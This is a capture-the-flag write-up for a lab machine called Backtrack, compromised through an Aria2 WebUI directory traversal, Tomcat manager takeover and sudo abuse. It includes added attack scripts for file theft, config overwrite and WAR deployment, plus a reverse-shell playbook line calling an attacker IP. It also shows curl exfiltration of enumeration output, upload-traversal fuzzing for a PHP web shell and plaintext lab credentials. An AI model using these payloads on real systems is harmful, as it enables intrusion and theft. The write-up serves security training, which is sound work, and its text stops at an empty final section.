The following post by anthonyjsaab is licensed under
0 - Introduction
1 - Port Scans
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -p- backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 06:57 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6800/tcp open unknown
8080/tcp open http-proxy
8888/tcp open sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 250.16 seconds
1b - Versions and OS
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -A -p22,6800,8080,8888 backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 07:02 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| 256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_ 256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open http Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open sun-answerbook?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Sat, 12 Oct 2024 04:02:31 GMT
| Connection: close
| <!doctype html>
| <html>
| <!-- {{{ head -->
| <head>
| <link rel="icon" href="../favicon.ico" />
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta name="theme-color" content="#0A8476">
| <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
| <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
| <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
| <!-- }}} -->
| <body ng-controller="MainCtrl" ng-cloak>
| <!-- {{{ Icons -->
|_ <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.94SVN%I=7%D=10/12%Time=6709F4D8%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,13F0,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html
--SNIP--
SF:olute;\x20width:\x200;\x20height:\x200;\x20overflow:\x20hidden;\"\x20ve
SF:rsion=\"1\.1\"\x20xm");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 97.57 ms 10.11.0.1
2 95.60 ms backtrack.thm (10.10.237.46)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.03 seconds
2 - Aria2 WebUI
2a - Finding the vuln
The HTTP server on port 8888 serves a front end called Aria2 WebUI, a browser client for the aria2 JSON-RPC daemon that nmap identified on port 6800. A quick Google search for known vulnerabilities in Aria2 WebUI turns up the following:
2b - Directory Traversal
After clearing the browser cache, proxying all requests through Burp and holding them for a while without forwarding, we can see how the WebUI behaves and what it sends without having to read its code. Several requests are intercepted without any interaction in the browser; this is the one we are interested in:
Excellent. This directory traversal lets us read files on the target, limited only by the permissions of the user the server runs as.
2c - Gathering sensitive info
Brute-forcing well-known file paths with Intruder crashes the Aria2 server, so we have to request files manually (or at least slowly) in order not to overwhelm it. What we learn:
Four accounts stand out based on their UIDs in /etc/passwd: root, tomcat, orville and wilbur.
We cannot log in as tomcat over SSH: its login shell is /bin/false.
We collected a password for tomcat from one of its well-known configuration files.
The server on port 8888 runs with the privileges of the tomcat user.
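The two steps above (reading files through the traversal without hammering the server, then picking the interesting accounts out of /etc/passwd) scripted as an added example; this is not code from the original write-up. It assumes the traversal is reachable as raw ../ segments in the request path of the server on port 8888 (the exact request is in the screenshot above), and the /etc/passwd content embedded for the demo is constructed, not the target's real file.

```sh
#!/bin/sh
# Added example, not from the write-up. Assumptions: the traversal works by
# sending literal '../' segments in the URL path; host name from the scans.
BASE="${BASE:-http://backtrack.thm:8888}"
DEPTH=6        # number of '../' segments; enough to reach / from any web root
DELAY=2        # seconds between requests: Intruder-speed bursts crashed the server

# Build the traversal URL for an absolute path on the target, e.g.
# traversal_url /etc/passwd -> http://backtrack.thm:8888/../../../../../../etc/passwd
traversal_url() {
  i=0; prefix=""
  while [ "$i" -lt "$DEPTH" ]; do prefix="$prefix../"; i=$((i+1)); done
  printf '%s/%s%s\n' "$BASE" "$prefix" "${1#/}"
}

# Fetch one file. --path-as-is stops curl from collapsing the '../' segments
# client-side before they ever reach the server.
fetch_file() {
  curl -s --path-as-is "$(traversal_url "$1")"
}

# Fetch a list of files (one absolute path per line on stdin), pausing between
# requests and saving each result under ./loot/.
fetch_list() {
  mkdir -p loot
  while IFS= read -r f; do
    [ -z "$f" ] && continue
    out="loot/$(printf '%s' "$f" | tr '/' '_')"
    fetch_file "$f" > "$out" && echo "[+] $f -> $out"
    sleep "$DELAY"
  done
}

# From passwd content on stdin, print root plus accounts with a regular-user
# UID (>= 1000). 65534 is 'nobody' on Ubuntu and is excluded on purpose.
human_accounts() {
  awk -F: '$3 == 0 || ($3 >= 1000 && $3 < 65534) {
             printf "%s uid=%s shell=%s\n", $1, $3, $7 }'
}

# Constructed sample (not the target's real file) so the filter can be run offline.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin'

demo_accounts() {
  printf '%s\n' "$SAMPLE_PASSWD" | human_accounts
}
```

Against the live target the flow is `printf '/etc/passwd\n' | fetch_list` followed by `human_accounts < loot/_etc_passwd`; the shell column is what tells you that tomcat (/bin/false) cannot be used over SSH even with a password.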
3 - Foothold
3a - Dead-ends
id_rsa
Trying to read the users' private keys (every user except tomcat) through the traversal yielded nothing.
authorized_keys
Writing my own public key into the respective .ssh directories did not work either, because the tomcat user lacks the permissions to do so:
3b - Tomcat, help!
The tomcat admin credentials we got are valid, but the account has little useful privilege: its only role is 'manager-script', which grants the /manager/text interface but not the /manager/html GUI.
We need to give this Tomcat user stronger roles, which means editing /opt/tomcat/conf/tomcat-users.xml. But how can we do that?
Well, since we already know that the server on port 8888 runs as the Linux 'tomcat' user (and the aria2 daemon it fronts presumably does too), the downloader can probably overwrite tomcat-users.xml for us by fetching a replacement straight into /opt/tomcat/conf.
I will host the following file on my machine; it is the same file with significantly higher roles assigned to the user:
Looking closely at the /manager/html panel above, you will notice that an application is already deployed at /reverse_shell!
Requesting it gives us the following:
I am not sure what is happening there, and it is not worth investigating: with the new roles I have enough privileges to deploy a shell of my own. I will use the reverse-shell JSP bundled with Kali at /usr/share/webshells/jsp/jsp-reverse.jsp.
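The whole Tomcat route above, as an added example rather than the write-up's own commands: build the replacement tomcat-users.xml, ask the aria2 daemon (JSON-RPC on port 6800, the back end of the WebUI on 8888) to download it over /opt/tomcat/conf/tomcat-users.xml, then deploy a WAR through the manager. The attacker host and port, the RPC-secret handling and the user/password placeholders are assumptions; the username and password come from the screenshot above. One caveat worth knowing: the /manager/text deploy endpoint used here already works with manager-script alone, so the role upgrade is what unlocks the HTML manager, not the deployment itself.

```sh
#!/bin/sh
# Added example, not from the write-up. Assumed: attacker URL (serve the XML
# with e.g. python3 -m http.server 8000), RPC endpoint, credential placeholders.
ATTACKER="${ATTACKER:-http://10.11.85.12:8000}"
ARIA2_RPC="${ARIA2_RPC:-http://backtrack.thm:6800/jsonrpc}"
TOMCAT="${TOMCAT:-http://backtrack.thm:8080}"

# Replacement tomcat-users.xml. Keep the recovered username/password ($1/$2)
# so the file stays consistent with credentials we already know are valid.
make_tomcat_users() {
  cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="$1" password="$2" roles="manager-gui,manager-script,admin-gui"/>
</tomcat-users>
EOF
}

# aria2.addUri request body: download $1 into directory $2 as file $3.
# allow-overwrite=true matters: with the default (false) aria2 leaves the
# existing file alone and writes tomcat-users.1.xml next to it instead.
# $4 is the optional rpc-secret; when set, aria2 expects "token:<secret>"
# as the first element of params.
aria2_addurl_payload() {
  if [ -n "$4" ]; then token="\"token:$4\","; else token=""; fi
  printf '{"jsonrpc":"2.0","id":"tu","method":"aria2.addUri","params":[%s["%s"],{"dir":"%s","out":"%s","allow-overwrite":"true"}]}' \
    "$token" "$1" "$2" "$3"
}

# Steps 1 and 2: write the XML into the directory being served, then queue the
# download on the target. The JSON reply carries a GID; aria2.tellStatus on
# that GID shows whether the write succeeded.
replace_tomcat_users() {   # $1 user, $2 pass, $3 rpc secret (may be empty)
  make_tomcat_users "$1" "$2" > tomcat-users.xml
  curl -s "$ARIA2_RPC" -H 'Content-Type: application/json' \
    -d "$(aria2_addurl_payload "$ATTACKER/tomcat-users.xml" /opt/tomcat/conf tomcat-users.xml "$3")"
}

# Step 3: deploy a WAR via the text interface (PUT with the WAR as the body).
# Build the WAR first with: jar cf shell.war jsp-reverse.jsp
deploy_war() {             # $1 user, $2 pass, $3 war file, $4 context path, e.g. /sh
  curl -s -u "$1:$2" -T "$3" "$TOMCAT/manager/text/deploy?path=$4&update=true"
}
```

Usage, with a listener already running: `replace_tomcat_users tomcat '<password>' ''`, then `deploy_war tomcat '<password>' shell.war /sh`, then request `$TOMCAT/sh/jsp-reverse.jsp` to trigger the callback. If the manager rejects the new roles, check the aria2 status for the GID before assuming the file was replaced.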
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.164.14] 38942
id
uid=1002(tomcat) gid=1002(tomcat) groups=1002(tomcat)
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@Backtrack:~$ ls -la /opt/tomcat/flag1.txt
ls -la /opt/tomcat/flag1.txt
-rw-r--r-- 1 tomcat tomcat 38 Mar 9 2024 /opt/tomcat/flag1.txt
tomcat@Backtrack:/tmp$ cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
tomcat@Backtrack:/tmp$ curl -X POST --data-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
curl: (1) Received HTTP/0.9 when not allowed
tomcat@Backtrack:/tmp$
Receiving and decoding the output (the curl error on the target is expected: nc is not an HTTP server, but the POST body has already been delivered by the time curl complains):
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 90 > tomcat-enum.txt.b64
listening on [any] 90 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.156.152] 40854
┌──(kali㉿kali)-[~/public_folder]
└─$ # removed HTTP headers from response, kept body
┌──(kali㉿kali)-[~/public_folder]
└─$ nano tomcat-enum.txt.b64
┌──(kali㉿kali)-[~/public_folder]
└─$ dos2unix tomcat-enum.txt.b64
dos2unix: converting file tomcat-enum.txt.b64 to Unix format...
┌──(kali㉿kali)-[~/public_folder]
└─$ cat tomcat-enum.txt.b64 | base64 -d > tomcat-enum.txt
Here is the LinPEAS output:
4b - Wilbur
The following lead presented itself before I had even run LinPEAS:
tomcat@Backtrack:/$ sudo -l
sudo -l
Matching Defaults entries for tomcat on Backtrack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tomcat may run the following commands on Backtrack:
(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
The wildcard gives us a lot of freedom. sudo matches command arguments against a sudoers wildcard as one plain string, so '*' also matches '/', and nothing stops us from traversing out of /opt/test_playbooks into a directory we control. There we store a custom playbook whose only task is a reverse shell command:
tomcat@Backtrack:/tmp$ cat rev.yml
- hosts: localhost
  tasks:
    - name: rev
      shell: bash -c 'bash -i >& /dev/tcp/10.11.85.12/9003 0>&1'
tomcat@Backtrack:/tmp$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../../tmp/rev.yml
[WARNING]: provided hosts list is empty, only localhost is available. Note that
the implicit localhost does not match 'all'
--SNIP--
[WARNING]: Skipping plugin (/usr/lib/python3/dist-
packages/ansible/plugins/callback/sumologic.py) as it seems to be invalid:
module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'
PLAY [localhost] ***************************************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [rev] *********************************************************************
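Before moving on to the listener, the sudoers check behind this trick and the check it is missing, as an added example (not code from the write-up). sudo matches the argument against the sudoers wildcard with fnmatch(3) without FNM_PATHNAME, so '*' in the argument pattern also matches '/'; POSIX shell case patterns behave the same way, which is why they model the decision faithfully. The sudoers rule and the paths are the ones shown above; nothing else is assumed.

```sh
#!/bin/sh
# Added example, not from the write-up. Models the rule
#   (wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
ALLOWED_DIR='/opt/test_playbooks'

# Would sudo accept this argument under the rule above? The literal pattern is
# the sudoers wildcard; in a case statement '*' matches '/' just like sudo's
# argument matching does.
matches_sudoers_glob() {
  case "$1" in
    /opt/test_playbooks/*.yml) return 0 ;;
    *) return 1 ;;
  esac
}

# Lexically collapse '.' and '..' so we see the file sudo will really hand to
# ansible-playbook. No filesystem access, so it works for paths that don't exist.
normalize_path() {
  out=""
  old_ifs=$IFS; IFS='/'
  for part in $1; do
    case "$part" in
      ''|'.') ;;
      '..') out=${out%/*} ;;
      *) out="$out/$part" ;;
    esac
  done
  IFS=$old_ifs
  printf '%s\n' "${out:-/}"
}

# The check the rule lacks: after normalisation, is the playbook still inside
# the directory the rule was meant to allow?
inside_allowed_dir() {
  case "$(normalize_path "$1")" in
    "$ALLOWED_DIR"/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Verdict for one candidate path: "allowed" (sudo accepts, file is where the
# rule intended), "escape" (sudo accepts, file is elsewhere), or "rejected".
classify() {
  if matches_sudoers_glob "$1"; then
    if inside_allowed_dir "$1"; then echo "allowed"; else echo "escape"; fi
  else
    echo "rejected"
  fi
}
```

`classify /opt/test_playbooks/../../../tmp/rev.yml` reports "escape": sudo accepts it, ansible runs /tmp/rev.yml. The fix on the defending side is to list the permitted playbooks by exact path in sudoers (no wildcard) and to make sure /opt/test_playbooks is not writable by the calling user; a normalisation step like `inside_allowed_dir` belongs in a wrapper script if a wildcard is unavoidable.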
┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.238.90] 33938
wilbur@Backtrack:/tmp$ id
id
uid=1004(wilbur) gid=1004(wilbur) groups=1004(wilbur)
wilbur@Backtrack:/tmp$ cd ~
wilbur@Backtrack:~$ ls -la
total 36
drwxrwx--- 5 wilbur wilbur 4096 Oct 13 07:34 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 07:22 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
drwx------ 2 wilbur wilbur 4096 Oct 13 07:34 .cache
drwx------ 3 wilbur wilbur 4096 Oct 13 07:28 .gnupg
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat .just_in_case.txt
in case i forget :
wilbur:mYe317Tb9qTNrWFND7KF
4c - Orville
Something promising had already appeared in the LinPEAS output, before we moved to wilbur:
With socat listening on the target and forwarding to that local-only service, I can reach it from my machine:
The website does not give us much room to exploit it from the browser, and it looked like a dead end, at least while I was tomcat. Now that I am wilbur, I have access to a very important file:
wilbur@Backtrack:~$ pwd
pwd
/home/wilbur
wilbur@Backtrack:~$ ls -la
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Oct 13 03:57 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 03:57 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat fr*
cat fr*
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:
email : orville@backtrack.thm
password : W34r3B3773r73nP3x3l$
wilbur@Backtrack:~$
This was the missing puzzle piece. Now I can log in and proceed:
We can see that there are no images yet. Let us upload an image of our own and see what happens.
The question now is: can we upload a shell? I will try to upload my favourite PHP web shell:
We have to bypass these filters:
Apache/2.4.41 does not have a known directory traversal published, so storing it somewhere on the filesystem using wilbur and trying to access it through Apache won't work
/var/www/html is not accessible using any of the users we compromised
We can, however, try prepending path traversal sequences to the filename:
A single ../ still stores the file in uploads/, so that fails. We use Intruder to try encoded variants that might place the file anywhere above uploads/ (ideally just one level up). For that we use a wordlist from a well-known repository:
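The candidate filenames that such a fuzzing run sends, generated locally as an added example (not the write-up's wordlist, whose contents are not on the page, and not the gallery app's code). The encodings are the usual ones and are an assumption about what is worth trying; generating them yourself lets you review the set and submit it slowly rather than as a burst.

```sh
#!/bin/sh
# Added example, not from the write-up. Emits traversal-prefixed filenames for
# an upload fuzz; the target's actual filters are unknown here.

# Repeat $1 exactly $2 times (no trailing newline).
repeat_seq() {
  i=0; out=""
  while [ "$i" -lt "$2" ]; do out="$out$1"; i=$((i+1)); done
  printf '%s' "$out"
}

# Print one candidate per line for every encoding and every depth 1..$2.
# Each encoding targets a different filter weakness:
#   ../        plain (fails here: the file still lands in uploads/)
#   ..%2f      slash decoded after the check
#   ..%252f    slash double-decoded
#   %2e%2e/    dots decoded after the check
#   %2e%2e%2f  dots and slash decoded after the check
#   ....//     filter strips one "../" non-recursively, leaving "../"
#   ..\ ..%5c  backslash treated as a path separator
traversal_candidates() {   # $1 base filename, $2 max depth
  d=1
  while [ "$d" -le "$2" ]; do
    for seq in '../' '..%2f' '..%252f' '%2e%2e/' '%2e%2e%2f' '....//' '..\' '..%5c'; do
      printf '%s%s\n' "$(repeat_seq "$seq" "$d")" "$1"
    done
    d=$((d+1))
  done
}
```

Feed the output to Intruder as a simple list, or loop over it with curl's multipart filename override (`-F 'field=@shell.php;filename=<candidate>'`, with the form field name taken from the intercepted upload request) and a sleep between requests; the same throttling that the Aria2 server needed is a good habit here too.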
However, opening the uploaded file just downloads it! But in the directory above uploads/, where login.php and dashboard.php are stored, PHP files are executed rather than sent as-is. Dead ends:
5 - ROOT